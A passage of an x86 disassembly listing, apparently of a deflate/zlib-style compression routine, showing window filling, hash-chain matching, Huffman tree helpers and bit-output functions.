jmp short loc_4177A8
; ---------------------------------------------------------------------------
loc_4177A6: ; CODE XREF: sub_417710+8C�j
xor ecx, ecx
loc_4177A8: ; CODE XREF: sub_417710+94�j
mov word_44C3A0[eax], cx
add eax, 2
cmp eax, 10000h
jb short loc_417793
xor eax, eax
jmp short loc_4177C0
; ---------------------------------------------------------------------------
align 10h
loc_4177C0: ; CODE XREF: sub_417710+AB�j
; sub_417710+D4�j
movzx ecx, ds:word_46C3C0[eax]
cmp ecx, ebp
jb short loc_4177D3
add ecx, 0FFFF8000h
jmp short loc_4177D5
; ---------------------------------------------------------------------------
loc_4177D3: ; CODE XREF: sub_417710+B9�j
xor ecx, ecx
loc_4177D5: ; CODE XREF: sub_417710+C1�j
mov ds:word_46C3C0[eax], cx
add eax, 2
cmp eax, 10000h
jb short loc_4177C0
mov eax, dword_430AF0
add ebx, ebp
test eax, eax
jz short loc_417806
push offset dword_42A320
push 2Eh
call sub_41ABD2
mov edx, ds:dword_47C3C4
add esp, 8
loc_417806: ; CODE XREF: sub_417710+30�j
; sub_417710+3B�j ...
mov eax, dword_430F6C
test eax, eax
jnz short loc_41785A
mov eax, dword_430F74
lea ecx, byte_45C3C0[edx+eax]
push ebx
push ecx
call off_42A064
add esp, 8
test eax, eax
jz short loc_417837
cmp eax, 0FFFFFFFFh
jz short loc_417837
add dword_430F74, eax
jmp short loc_417841
; ---------------------------------------------------------------------------
loc_417837: ; CODE XREF: sub_417710+118�j
; sub_417710+11D�j
mov dword_430F6C, 1
loc_417841: ; CODE XREF: sub_417710+125�j
cmp dword_430F74, 106h
jnb short loc_41785A
mov eax, dword_430F6C
test eax, eax
jz loc_417720
loc_41785A: ; CODE XREF: sub_417710+FD�j
; sub_417710+13B�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_417710 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417860 proc near ; CODE XREF: sub_416DF0+1A6�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 10h
push ebx
mov ebx, dword_430F74
test ebx, ebx
push ebp
push esi
mov esi, ds:dword_47C3C4
mov [esp+1Ch+var_8], 0
mov [esp+1Ch+var_C], 0
mov ebp, 2
jz loc_417B32
push edi
mov edi, dword_430F7C
jmp short loc_4178A0
; ---------------------------------------------------------------------------
loc_417898: ; CODE XREF: sub_417860+2AC�j
mov ebp, [esp+20h+var_10]
lea esp, [esp+0]
loc_4178A0: ; CODE XREF: sub_417860+36�j
cmp ebx, 3
jb short loc_4178E2
movzx eax, byte_45C3C2[esi]
shl edi, 5
xor eax, edi
and eax, 7FFFh
mov edi, eax
movzx eax, word_44C3A0[edi*2]
mov ecx, esi
and ecx, 7FFFh
mov dword_430F7C, edi
mov [esp+20h+var_8], eax
mov ds:word_46C3C0[ecx*2], ax
mov word_44C3A0[edi*2], si
loc_4178E2: ; CODE XREF: sub_417860+43�j
mov eax, [esp+20h+var_8]
test eax, eax
mov edx, dword_44C384
mov dword_44C37C, ebp
mov [esp+20h+var_4], edx
mov [esp+20h+var_10], 2
jz short loc_41795A
cmp ebp, dword_430F78
jnb short loc_41795A
mov ecx, esi
sub ecx, eax
cmp ecx, 7EFAh
ja short loc_41795A
cmp ds:dword_47C3C8, ebx
jbe short loc_417924
mov ds:dword_47C3C8, ebx
loc_417924: ; CODE XREF: sub_417860+BC�j
push eax
call sub_4175C0
add esp, 4
cmp eax, ebx
mov [esp+20h+var_10], eax
jbe short loc_41793B
mov [esp+20h+var_10], ebx
mov eax, ebx
loc_41793B: ; CODE XREF: sub_417860+D3�j
cmp eax, 3
jnz short loc_41795A
mov ecx, dword_44C384
mov edx, esi
sub edx, ecx
cmp edx, 1000h
jbe short loc_41795A
mov [esp+20h+var_10], 2
loc_41795A: ; CODE XREF: sub_417860+A0�j
; sub_417860+A8�j ...
cmp ebp, 3
jb loc_417A61
cmp [esp+20h+var_10], ebp
ja loc_417A61
mov ecx, [esp+20h+var_4]
lea eax, [esi+ebx-3]
add ebp, 0FFFFFFFDh
sub esi, ecx
push ebp
dec esi
push esi
mov [esp+28h+var_C], eax
call sub_418060
mov ecx, dword_44C37C
mov ebx, dword_430F74
mov edi, dword_430F7C
mov esi, ds:dword_47C3C4
mov edx, 1
sub edx, ecx
add ebx, edx
add esp, 8
mov dword_430F74, ebx
sub ecx, 2
loc_4179B3: ; CODE XREF: sub_417860+195�j
mov edx, [esp+20h+var_C]
inc esi
cmp esi, edx
ja short loc_4179F4
movzx edx, byte_45C3C2[esi]
shl edi, 5
xor edx, edi
and edx, 7FFFh
mov edi, edx
movzx edx, word_44C3A0[edi*2]
mov ebp, esi
and ebp, 7FFFh
mov [esp+20h+var_8], edx
mov ds:word_46C3C0[ebp*2], dx
mov word_44C3A0[edi*2], si
loc_4179F4: ; CODE XREF: sub_417860+15A�j
dec ecx
jnz short loc_4179B3
inc esi
test eax, eax
mov dword_44C37C, ecx
mov dword_430F7C, edi
mov ds:dword_47C3C4, esi
mov [esp+20h+var_C], 0
mov [esp+20h+var_10], 2
jz loc_417AEB
mov ecx, ds:dword_47C3C0
test ecx, ecx
jl short loc_417A34
lea eax, byte_45C3C0[ecx]
jmp short loc_417A36
; ---------------------------------------------------------------------------
loc_417A34: ; CODE XREF: sub_417860+1CA�j
xor eax, eax
loc_417A36: ; CODE XREF: sub_417860+1D2�j
push 0
sub esi, ecx
push esi
push eax
call sub_418D90
mov esi, ds:dword_47C3C4
mov ebx, dword_430F74
mov edi, dword_430F7C
add esp, 0Ch
mov ds:dword_47C3C0, esi
jmp loc_417AEB
; ---------------------------------------------------------------------------
loc_417A61: ; CODE XREF: sub_417860+FD�j
; sub_417860+107�j
mov eax, [esp+20h+var_C]
test eax, eax
jz short loc_417AD5
movzx eax, byte_45C3BF[esi]
push eax
push 0
call sub_418060
add esp, 8
test eax, eax
jz short loc_417AC1
mov ecx, ds:dword_47C3C0
test ecx, ecx
jl short loc_417A91
lea eax, byte_45C3C0[ecx]
jmp short loc_417A93
; ---------------------------------------------------------------------------
loc_417A91: ; CODE XREF: sub_417860+227�j
xor eax, eax
loc_417A93: ; CODE XREF: sub_417860+22F�j
mov edx, ds:dword_47C3C4
push 0
sub edx, ecx
push edx
push eax
call sub_418D90
mov esi, ds:dword_47C3C4
mov ebx, dword_430F74
mov edi, dword_430F7C
add esp, 0Ch
mov ds:dword_47C3C0, esi
jmp short loc_417ADD
; ---------------------------------------------------------------------------
loc_417AC1: ; CODE XREF: sub_417860+21D�j
mov esi, ds:dword_47C3C4
mov ebx, dword_430F74
mov edi, dword_430F7C
jmp short loc_417ADD
; ---------------------------------------------------------------------------
loc_417AD5: ; CODE XREF: sub_417860+207�j
mov [esp+20h+var_C], 1
loc_417ADD: ; CODE XREF: sub_417860+25F�j
; sub_417860+273�j
inc esi
dec ebx
mov ds:dword_47C3C4, esi
mov dword_430F74, ebx
loc_417AEB: ; CODE XREF: sub_417860+1BC�j
; sub_417860+1FC�j
cmp ebx, 106h
jnb short loc_417B0A
call sub_417710
mov ebx, dword_430F74
mov edi, dword_430F7C
mov esi, ds:dword_47C3C4
loc_417B0A: ; CODE XREF: sub_417860+291�j
test ebx, ebx
jnz loc_417898
mov eax, [esp+20h+var_C]
test eax, eax
pop edi
jz short loc_417B32
movzx eax, byte_45C3BF[esi]
push eax
push ebx
call sub_418060
mov esi, ds:dword_47C3C4
add esp, 8
loc_417B32: ; CODE XREF: sub_417860+29�j
; sub_417860+2B9�j
mov ecx, ds:dword_47C3C0
test ecx, ecx
jl short loc_417B44
lea eax, byte_45C3C0[ecx]
jmp short loc_417B46
; ---------------------------------------------------------------------------
loc_417B44: ; CODE XREF: sub_417860+2DA�j
xor eax, eax
loc_417B46: ; CODE XREF: sub_417860+2E2�j
push 1
sub esi, ecx
push esi
push eax
call sub_418D90
add esp, 0Ch
pop esi
pop ebp
pop ebx
add esp, 10h
retn
sub_417860 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417B60 proc near ; CODE XREF: sub_416DF0+19E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, dword_45C3A0
push esi
xor esi, esi
cmp eax, esi
mov dword_430F70, esi
jnz short loc_417B86
mov dword_430F70, 1
mov dword_45C3A0, 10000h
loc_417B86: ; CODE XREF: sub_417B60+10�j
push edi
xor eax, eax
mov word_45C39E, si
mov ecx, 3FFFh
mov edi, offset word_44C3A0
rep stosd
stosw
mov eax, [esp+8+arg_0]
cmp eax, 2
movzx ecx, word_42A06A[eax*8]
movzx edx, word_42A068[eax*8]
mov dword_430F78, ecx
movzx ecx, word_42A06C[eax*8]
mov dword_44C378, edx
movzx edx, word_42A06E[eax*8]
mov ds:dword_47C3C8, ecx
mov dword_44C380, edx
pop edi
jg short loc_417BE9
mov eax, [esp+4+arg_4]
or byte ptr [eax], 4
jmp short loc_417BF5
; ---------------------------------------------------------------------------
loc_417BE9: ; CODE XREF: sub_417B60+7E�j
cmp eax, 8
jl short loc_417BF5
mov eax, [esp+4+arg_4]
or byte ptr [eax], 2
loc_417BF5: ; CODE XREF: sub_417B60+87�j
; sub_417B60+8C�j
push 10000h
push offset byte_45C3C0
mov ds:dword_47C3C4, esi
mov ds:dword_47C3C0, esi
call off_42A064
add esp, 8
cmp eax, esi
mov dword_430F74, eax
jz short loc_417C53
cmp eax, 0FFFFFFFFh
jz short loc_417C53
cmp eax, 106h
mov dword_430F6C, esi
jnb short loc_417C34
call sub_417710
loc_417C34: ; CODE XREF: sub_417B60+CD�j
movzx eax, byte_45C3C0
movzx ecx, byte_45C3C1
shl eax, 5
xor eax, ecx
and eax, 7FFFh
mov dword_430F7C, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_417C53: ; CODE XREF: sub_417B60+BB�j
; sub_417B60+C0�j
mov dword_430F74, esi
mov dword_430F6C, 1
pop esi
retn
sub_417B60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417C70 proc near ; CODE XREF: sub_418B00+282�j
; sub_418D90:loc_418F25�p
mov eax, offset word_441210
xor ecx, ecx
jmp short loc_417C80
; ---------------------------------------------------------------------------
align 10h
loc_417C80: ; CODE XREF: sub_417C70+7�j
; sub_417C70+1B�j
mov [eax], cx
add eax, 4
cmp eax, offset dword_441688
jl short loc_417C80
mov eax, offset word_44BD28
loc_417C92: ; CODE XREF: sub_417C70+2D�j
mov [eax], cx
add eax, 4
cmp eax, offset dword_44BDA0
jl short loc_417C92
mov eax, offset word_44BC88
loc_417CA4: ; CODE XREF: sub_417C70+3F�j
mov [eax], cx
add eax, 4
cmp eax, offset dword_44BCD4
jl short loc_417CA4
mov eax, 1
mov word_441610, ax
mov dword_430FFC, ecx
mov dword_44BB7C, ecx
mov dword_431000, ecx
mov dword_44A888, ecx
mov dword_44BB84, ecx
mov byte_44A92C, cl
mov byte_44BD24, al
retn
sub_417C70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417CF0 proc near ; CODE XREF: sub_4185D0+D1�p
; sub_4185D0+FC�p ...
arg_0 = dword ptr 4
mov ecx, dword_441F88
push ebx
push ebp
mov ebp, [esp+8+arg_0]
mov ebx, dword_441F90[ebp*4]
lea eax, [ebp+ebp+0]
cmp eax, ecx
mov [esp+8+arg_0], ebx
jg short loc_417D88
push edi
cmp eax, ecx
loc_417D12: ; CODE XREF: sub_417CF0+8B�j
jge short loc_417D44
mov edi, dword_441F94[eax*4]
mov ebx, dword_441F90[eax*4]
mov cx, [esi+edi*4]
mov dx, [esi+ebx*4]
cmp cx, dx
jb short loc_417D3F
jnz short loc_417D40
mov cl, byte_44B938[edi]
cmp cl, byte_44B938[ebx]
ja short loc_417D40
loc_417D3F: ; CODE XREF: sub_417CF0+3D�j
inc eax
loc_417D40: ; CODE XREF: sub_417CF0+3F�j
; sub_417CF0+4D�j
mov ebx, [esp+0Ch+arg_0]
loc_417D44: ; CODE XREF: sub_417CF0:loc_417D12�j
mov ecx, dword_441F90[eax*4]
mov dx, [esi+ebx*4]
mov di, [esi+ecx*4]
cmp dx, di
jb short loc_417D7D
jnz short loc_417D68
mov dl, byte_44B938[ebx]
cmp dl, byte_44B938[ecx]
jbe short loc_417D7D
loc_417D68: ; CODE XREF: sub_417CF0+68�j
mov dword_441F90[ebp*4], ecx
mov ecx, dword_441F88
mov ebp, eax
shl eax, 1
cmp eax, ecx
jle short loc_417D12
loc_417D7D: ; CODE XREF: sub_417CF0+66�j
; sub_417CF0+76�j
pop edi
mov dword_441F90[ebp*4], ebx
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_417D88: ; CODE XREF: sub_417CF0+1D�j
mov dword_441F90[ebp*4], ebx
pop ebp
pop ebx
retn
sub_417CF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417DA0 proc near ; CODE XREF: sub_4185D0+191�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
mov ecx, [eax+8]
mov edx, [eax+0Ch]
push ebx
mov ebx, [eax+14h]
push ebp
mov [esp+20h+var_8], ecx
mov ecx, [eax+18h]
mov [esp+20h+var_C], edx
mov edx, [eax+4]
push edi
mov edi, [eax]
xor eax, eax
mov dword_44A894, eax
mov dword_44A898, eax
mov dword_44A89C, eax
mov dword_44A8A0, eax
mov dword_44A8A4, eax
mov dword_44A8A8, eax
mov dword_44A8AC, eax
mov dword_44A8B0, eax
mov eax, dword_430FF8
lea ebp, [eax+1]
mov [esp+24h+var_10], ecx
mov ecx, dword_441F90[eax*4]
mov [esp+24h+var_4], edx
xor edx, edx
cmp ebp, 23Dh
mov [esp+24h+var_18], edx
mov [edi+ecx*4+2], dx
mov [esp+24h+var_14], ebp
jge loc_417F6C
push esi
lea esp, [esp+0]
loc_417E20: ; CODE XREF: sub_417DA0+10D�j
mov ecx, dword_441F90[ebp*4]
movzx eax, word ptr [edi+ecx*4+2]
movzx eax, word ptr [edi+eax*4+2]
inc eax
cmp eax, ebx
jle short loc_417E3D
inc edx
mov eax, ebx
mov [esp+28h+var_18], edx
loc_417E3D: ; CODE XREF: sub_417DA0+94�j
cmp ecx, [esp+28h+var_10]
mov [edi+ecx*4+2], ax
jg short loc_417EA2
mov edx, [esp+28h+var_C]
inc word ptr dword_44A894[eax*2]
xor esi, esi
cmp ecx, edx
jl short loc_417E65
mov esi, ecx
sub esi, edx
mov edx, [esp+28h+var_8]
mov esi, [edx+esi*4]
loc_417E65: ; CODE XREF: sub_417DA0+B8�j
movzx edx, word ptr [edi+ecx*4]
mov ebp, dword_44BB7C
add eax, esi
imul eax, edx
add ebp, eax
mov eax, [esp+28h+var_4]
test eax, eax
mov dword_44BB7C, ebp
mov ebp, [esp+28h+var_14]
jz short loc_417E9E
movzx ecx, word ptr [eax+ecx*4+2]
mov eax, dword_430FFC
add ecx, esi
imul ecx, edx
add eax, ecx
mov dword_430FFC, eax
loc_417E9E: ; CODE XREF: sub_417DA0+E6�j
mov edx, [esp+28h+var_18]
loc_417EA2: ; CODE XREF: sub_417DA0+A6�j
inc ebp
cmp ebp, 23Dh
mov [esp+28h+var_14], ebp
jl loc_417E20
test edx, edx
jz loc_417F6B
lea ecx, [ebx-1]
mov edi, edi
loc_417EC0: ; CODE XREF: sub_417DA0+161�j
mov eax, ecx
cmp word ptr dword_44A894[eax*2], 0
jnz short loc_417EDC
lea ecx, [ecx+0]
loc_417ED0: ; CODE XREF: sub_417DA0+13A�j
dec eax
cmp word ptr dword_44A894[eax*2], 0
jz short loc_417ED0
loc_417EDC: ; CODE XREF: sub_417DA0+12B�j
dec word ptr dword_44A894[eax*2]
add word ptr dword_44A894+2[eax*2], 2
dec word ptr dword_44A894[ebx*2]
lea eax, ds:44A896h[eax*2]
sub edx, 2
test edx, edx
jg short loc_417EC0
test ebx, ebx
mov ecx, ebx
jz short loc_417F6B
lea esp, [esp+0]
loc_417F10: ; CODE XREF: sub_417DA0+1C9�j
movzx ebx, word ptr dword_44A894[ecx*2]
test ebx, ebx
mov [esp+28h+var_14], ebx
jz short loc_417F68
loc_417F20: ; CODE XREF: sub_417DA0+1C6�j
mov eax, dword_441F8C[ebp*4]
mov edx, [esp+28h+var_10]
dec ebp
cmp eax, edx
jg short loc_417F64
mov si, [edi+eax*4+2]
cmp si, cx
lea edx, [edi+eax*4+2]
jz short loc_417F5F
movzx eax, word ptr [edi+eax*4]
movzx esi, si
mov ebx, ecx
sub ebx, esi
imul ebx, eax
mov eax, dword_44BB7C
add eax, ebx
mov ebx, [esp+28h+var_14]
mov dword_44BB7C, eax
mov [edx], cx
loc_417F5F: ; CODE XREF: sub_417DA0+19C�j
dec ebx
mov [esp+28h+var_14], ebx
loc_417F64: ; CODE XREF: sub_417DA0+18E�j
test ebx, ebx
jnz short loc_417F20
loc_417F68: ; CODE XREF: sub_417DA0+17E�j
dec ecx
jnz short loc_417F10
loc_417F6B: ; CODE XREF: sub_417DA0+115�j
; sub_417DA0+167�j
pop esi
loc_417F6C: ; CODE XREF: sub_417DA0+75�j
pop edi
pop ebp
pop ebx
add esp, 18h
retn
sub_417DA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417F80 proc near ; CODE XREF: sub_4188D0+B�p
; sub_4188D0+1B�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
movzx edi, word ptr [eax+2]
or ebp, 0FFFFFFFFh
xor edx, edx
test edi, edi
mov ebx, ecx
mov ecx, 7
mov esi, 4
jnz short loc_417FA8
mov ecx, 8Ah
mov esi, 3
loc_417FA8: ; CODE XREF: sub_417F80+1C�j
test ebx, ebx
mov word ptr [eax+ebx*4+6], 0FFFFh
jl loc_41804E
add eax, 6
mov [esp+14h+var_4], eax
inc ebx
nop
loc_417FC0: ; CODE XREF: sub_417F80+C8�j
mov eax, edi
mov edi, [esp+14h+var_4]
movzx edi, word ptr [edi]
inc edx
cmp edx, ecx
jge short loc_417FD2
cmp eax, edi
jz short loc_41803C
loc_417FD2: ; CODE XREF: sub_417F80+4C�j
cmp edx, esi
jge short loc_417FE0
add word_44BC88[eax*4], dx
jmp short loc_41800E
; ---------------------------------------------------------------------------
loc_417FE0: ; CODE XREF: sub_417F80+54�j
test eax, eax
jz short loc_417FF9
cmp eax, ebp
jz short loc_417FF0
inc word_44BC88[eax*4]
loc_417FF0: ; CODE XREF: sub_417F80+66�j
inc word_44BCC8
jmp short loc_41800E
; ---------------------------------------------------------------------------
loc_417FF9: ; CODE XREF: sub_417F80+62�j
cmp edx, 0Ah
jg short loc_418007
inc word_44BCCC
jmp short loc_41800E
; ---------------------------------------------------------------------------
loc_418007: ; CODE XREF: sub_417F80+7C�j
inc word_44BCD0
loc_41800E: ; CODE XREF: sub_417F80+5E�j
; sub_417F80+77�j ...
xor edx, edx
test edi, edi
mov ebp, eax
jnz short loc_418022
mov ecx, 8Ah
mov esi, 3
jmp short loc_41803C
; ---------------------------------------------------------------------------
loc_418022: ; CODE XREF: sub_417F80+94�j
cmp eax, edi
jnz short loc_418032
mov ecx, 6
mov esi, 3
jmp short loc_41803C
; ---------------------------------------------------------------------------
loc_418032: ; CODE XREF: sub_417F80+A4�j
mov ecx, 7
mov esi, 4
loc_41803C: ; CODE XREF: sub_417F80+50�j
; sub_417F80+A0�j ...
mov eax, [esp+14h+var_4]
add eax, 4
dec ebx
mov [esp+14h+var_4], eax
jnz loc_417FC0
loc_41804E: ; CODE XREF: sub_417F80+31�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_417F80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418060 proc near ; CODE XREF: sub_417860+121�p
; sub_417860+213�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
mov ebx, dword_44BB84
mov byte_442888[ebx], cl
inc ebx
test eax, eax
mov dword_44BB84, ebx
jnz short loc_41808A
inc word_441210[ecx*4]
jmp short loc_4180E5
; ---------------------------------------------------------------------------
loc_41808A: ; CODE XREF: sub_418060+1E�j
movzx ecx, byte ptr dword_44BB88[ecx]
dec eax
inc word_441614[ecx*4]
cmp eax, 100h
jge short loc_4180AA
movzx ecx, byte ptr dword_431008[eax]
jmp short loc_4180B6
; ---------------------------------------------------------------------------
loc_4180AA: ; CODE XREF: sub_418060+3F�j
mov ecx, eax
sar ecx, 7
movzx ecx, byte ptr dword_431108[ecx]
loc_4180B6: ; CODE XREF: sub_418060+48�j
inc word_44BD28[ecx*4]
mov ecx, dword_44A888
mov dl, byte_44BD24
mov word_431210[ecx*2], ax
mov al, byte_44A92C
inc ecx
or al, dl
mov dword_44A888, ecx
mov byte_44A92C, al
loc_4180E5: ; CODE XREF: sub_418060+28�j
mov cl, byte_44BD24
shl cl, 1
test bl, 7
mov byte_44BD24, cl
jnz short loc_41811D
mov eax, dword_431000
mov cl, byte_44A92C
mov byte_44A930[eax], cl
inc eax
mov dword_431000, eax
mov byte_44A92C, 0
mov byte_44BD24, 1
loc_41811D: ; CODE XREF: sub_418060+96�j
cmp dword_42A04C, 2
jle loc_4181FC
test ebx, 0FFFh
jnz loc_4181FC
mov eax, ds:dword_47C3C0
mov edx, ds:dword_47C3C4
push ebp
push esi
sub edx, eax
lea ecx, ds:0[ebx*8]
xor eax, eax
push edi
nop
loc_418150: ; CODE XREF: sub_418060+175�j
movzx edi, word_44BD3C[eax]
mov esi, dword_42A144[eax]
movzx ebp, word_44BD38[eax]
add esi, 5
imul esi, edi
mov edi, dword_42A140[eax]
add edi, 5
imul edi, ebp
movzx ebp, word_44BD34[eax]
add esi, edi
mov edi, dword_42A13C[eax]
add edi, 5
imul edi, ebp
movzx ebp, word_44BD30[eax]
add esi, edi
mov edi, dword_42A138[eax]
add edi, 5
imul edi, ebp
movzx ebp, word_44BD2C[eax]
add esi, edi
mov edi, dword_42A134[eax]
add edi, 5
imul edi, ebp
movzx ebp, word_44BD28[eax]
add esi, edi
mov edi, dword_42A130[eax]
add edi, 5
imul edi, ebp
add edi, ecx
add eax, 18h
cmp eax, 78h
lea ecx, [edi+esi]
jl loc_418150
mov esi, dword_44A888
mov eax, ebx
shr eax, 1
pop edi
cmp esi, eax
pop esi
pop ebp
jnb short loc_4181FC
shr ecx, 2
and ecx, 3FFFFFFEh
and edx, 0FFFFFFFEh
cmp ecx, edx
jb short loc_418214
loc_4181FC: ; CODE XREF: sub_418060+C4�j
; sub_418060+D0�j ...
cmp ebx, 7FFFh
jz short loc_418214
cmp dword_44A888, 8000h
jz short loc_418214
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_418214: ; CODE XREF: sub_418060+19A�j
; sub_418060+1A2�j ...
mov eax, 1
pop ebx
retn
sub_418060 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418220 proc near ; CODE XREF: sub_418D90+1E�p
mov ecx, 0F3FFC07Fh
mov eax, offset word_441210
lea ebx, [ebx+0]
loc_418230: ; CODE XREF: sub_418220+25�j
test cl, 1
jz short loc_41823B
cmp word ptr [eax], 0
jnz short loc_41828B
loc_41823B: ; CODE XREF: sub_418220+13�j
add eax, 4
shr ecx, 1
cmp eax, offset dword_44128C
jle short loc_418230
mov ecx, dword_44BB80
mov word ptr [ecx], 1
cmp word_441234, 0
jnz short locret_41828A
cmp word_441238, 0
jnz short locret_41828A
cmp word_441244, 0
jnz short locret_41828A
mov eax, offset dword_441290
loc_418275: ; CODE XREF: sub_418220+63�j
cmp word ptr [eax], 0
jnz short locret_41828A
add eax, 4
cmp eax, offset word_441610
jl short loc_418275
mov word ptr [ecx], 0
locret_41828A: ; CODE XREF: sub_418220+3A�j
; sub_418220+44�j ...
retn
; ---------------------------------------------------------------------------
loc_41828B: ; CODE XREF: sub_418220+19�j
mov eax, dword_44BB80
mov word ptr [eax], 0
retn
sub_418220 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4182A0 proc near ; CODE XREF: sub_416DF0+186�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
mov edx, [esp+arg_8]
mov dword_44BE1C, eax
xor eax, eax
mov dword_44A88C, ecx
mov dword_441B04, eax
mov dword_44B934, edx
mov dword_431208, eax
mov dword_44B930, eax
retn
sub_4182A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4182D0 proc near ; CODE XREF: sub_418780+67�p
; sub_418780+90�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
push esi
mov esi, eax
mov eax, dword_44B930
mov ecx, eax
mov edx, esi
shl edx, cl
push edi
mov edi, dword_431208
add eax, ebp
or edi, edx
cmp eax, 10h
mov dword_431208, edi
mov dword_44B930, eax
jle short loc_418367
mov ecx, dword_44A88C
mov edx, dword_441B04
dec ecx
cmp edx, ecx
jb short loc_418328
mov edx, dword_44BE1C
push offset dword_441B04
push edx
call sub_416DC0
mov eax, dword_44B930
add esp, 8
loc_418328: ; CODE XREF: sub_4182D0+3D�j
mov edi, dword_441B04
mov ecx, dword_44BE1C
mov edx, dword_431208
mov [ecx+edi], dl
mov edi, dword_441B04
inc edi
mov dword_441B04, edi
mov [ecx+edi], dh
inc dword_441B04
sub eax, 10h
mov ecx, ebp
sub ecx, eax
shr esi, cl
mov dword_44B930, eax
mov dword_431208, esi
loc_418367: ; CODE XREF: sub_4182D0+2C�j
pop edi
pop esi
pop ebp
retn
sub_4182D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418370 proc near ; CODE XREF: sub_418440+4�p
; sub_418D90+1A1�p
mov eax, dword_44B930
push esi
xor esi, esi
cmp eax, 8
jle short loc_4183CD
mov eax, dword_44A88C
mov ecx, dword_441B04
dec eax
cmp ecx, eax
jb short loc_4183A1
mov ecx, dword_44BE1C
push offset dword_441B04
push ecx
call sub_416DC0
add esp, 8
loc_4183A1: ; CODE XREF: sub_418370+1B�j
mov edx, dword_441B04
mov ecx, dword_431208
mov eax, dword_44BE1C
mov [eax+edx], cl
mov edx, dword_441B04
inc edx
mov dword_441B04, edx
mov [eax+edx], ch
inc dword_441B04
jmp short loc_418413
; ---------------------------------------------------------------------------
loc_4183CD: ; CODE XREF: sub_418370+B�j
cmp eax, esi
jle short loc_41840E
mov eax, dword_441B04
cmp eax, dword_44A88C
jb short loc_4183F2
mov ecx, dword_44BE1C
push offset dword_441B04
push ecx
call sub_416DC0
add esp, 8
loc_4183F2: ; CODE XREF: sub_418370+6C�j
mov ecx, dword_441B04
mov eax, dword_44BE1C
mov dl, byte ptr dword_431208
mov [eax+ecx], dl
inc dword_441B04
jmp short loc_418413
; ---------------------------------------------------------------------------
loc_41840E: ; CODE XREF: sub_418370+5F�j
mov eax, dword_44BE1C
loc_418413: ; CODE XREF: sub_418370+5B�j
; sub_418370+9C�j
cmp dword_44B934, esi
jz short loc_418429
push offset dword_441B04
push eax
call sub_416DC0
add esp, 8
loc_418429: ; CODE XREF: sub_418370+A9�j
mov dword_431208, esi
mov dword_44B930, esi
pop esi
retn
sub_418370 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418440 proc near ; CODE XREF: sub_418D90+95�p
; sub_418D90+FD�p
arg_0 = dword ptr 4
push esi
push edi
mov esi, eax
call sub_418370
mov eax, [esp+8+arg_0]
test eax, eax
jz loc_4184EB
mov eax, dword_44A88C
mov ecx, dword_441B04
dec eax
cmp ecx, eax
jb short loc_418479
mov ecx, dword_44BE1C
push offset dword_441B04
push ecx
call sub_416DC0
add esp, 8
loc_418479: ; CODE XREF: sub_418440+23�j
mov edx, dword_441B04
mov eax, dword_44BE1C
mov [eax+edx], bl
mov ecx, dword_441B04
mov edx, dword_44A88C
inc ecx
mov dword_441B04, ecx
mov [eax+ecx], bh
mov ecx, dword_441B04
inc ecx
dec edx
cmp ecx, edx
mov dword_441B04, ecx
jb short loc_4184C2
push offset dword_441B04
push eax
call sub_416DC0
mov eax, dword_44BE1C
add esp, 8
loc_4184C2: ; CODE XREF: sub_418440+6D�j
mov edx, dword_441B04
mov cl, bl
not cl
mov [eax+edx], cl
mov edi, dword_441B04
inc edi
mov ecx, ebx
not ecx
mov dword_441B04, edi
mov [eax+edi], ch
inc dword_441B04
jmp short loc_4184F0
; ---------------------------------------------------------------------------
loc_4184EB: ; CODE XREF: sub_418440+F�j
mov eax, dword_44BE1C
loc_4184F0: ; CODE XREF: sub_418440+A9�j
mov ecx, dword_44B934
test ecx, ecx
jz short loc_41851C
push offset dword_441B04
push eax
call sub_416DC0
push offset dword_441B04
push esi
mov dword_441B04, ebx
call sub_416DC0
add esp, 10h
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41851C: ; CODE XREF: sub_418440+B8�j
mov edx, dword_441B04
lea edi, [eax+edx]
mov ecx, ebx
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, dword_441B04
add eax, ebx
pop edi
mov dword_441B04, eax
pop esi
retn
sub_418440 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418550 proc near ; CODE XREF: sub_4185D0+19C�p
; sub_418B00+247�p
var_24 = word ptr -24h
var_4 = dword ptr -4
sub esp, 24h
mov eax, dword_42A290
mov [esp+24h+var_4], eax
xor ecx, ecx
